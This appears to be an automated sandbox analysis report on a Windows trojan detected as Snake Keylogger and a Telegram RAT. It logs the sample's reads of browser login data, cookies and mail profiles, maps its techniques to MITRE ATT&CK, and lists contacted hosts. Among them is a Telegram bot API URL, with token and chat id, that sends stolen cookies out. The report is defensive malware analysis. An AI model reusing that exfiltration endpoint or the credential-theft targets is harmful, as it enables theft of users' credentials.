Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\000027_A-000032.exe

0_2_0040322B

Source: C:\Windows\SysWOW64\msiexec.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.2915272738.00000000229A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 6404, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match	File source: 00000006.00000002.2915272738.0000000022AA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 6404, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.2915272738.00000000229A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 6404, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	2 Obfuscated Files or Information	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 Software Packing	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	131 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	25 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
000027_A-000032.exe	40%	Virustotal		Browse
000027_A-000032.exe	46%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Igaar\000027_A-000032.exe	46%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
http://mail.ndovumotor.com	0%	Avira URL Cloud	safe
http://crl.microv	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0-	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
mail.ndovumotor.com	199.188.200.194	true	true	unknown
drive.google.com	142.250.186.46	true	false	high
drive.usercontent.google.com	172.217.16.193	true	false	high
reallyfreegeoip.org	104.21.16.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot7855907741:AAE8geAKHsbOjUTKKIp5xQcpPo7PZ41e12I/sendDocument?chat_id=5039346757&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2020/02/2025%20/%2005:05:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	msiexec.exe, 00000006.00000002.2918802703.0000000023C67000.00000004.00000800.00020000.00000000.sdmp	false		high
